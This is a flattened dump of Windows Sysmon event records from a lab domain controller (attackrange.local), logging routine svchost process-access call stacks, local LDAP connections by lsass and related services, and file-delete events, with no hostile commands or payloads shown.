10341000x80000000000000004662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.097{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000004657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.051{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+b680|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000004656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.051{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:14.035{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.035{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b
1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000004653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.004{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004787Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004786Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000004782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.966{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.950{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.950{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:15.950{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.935{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000004776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.450{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53579-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.450{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT 
AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53579-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.202{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53578-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.202{266CAFBE-64C4-6064-A300-00000000AE01}5052C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53578-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.180{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53577-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000004771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.180{266CAFBE-64C4-6064-A300-00000000AE01}5052C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53577-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x80000000000000004770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:15.452{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB51A6B1059970A9E6BA5CF4ECB9CF09,SHA256=86367644FB0C042F96D959E96DBC20490EC332B63DD82070EF02069EB447DA1F,IMPHASH=00000000000000000000000000000000falsetrue 
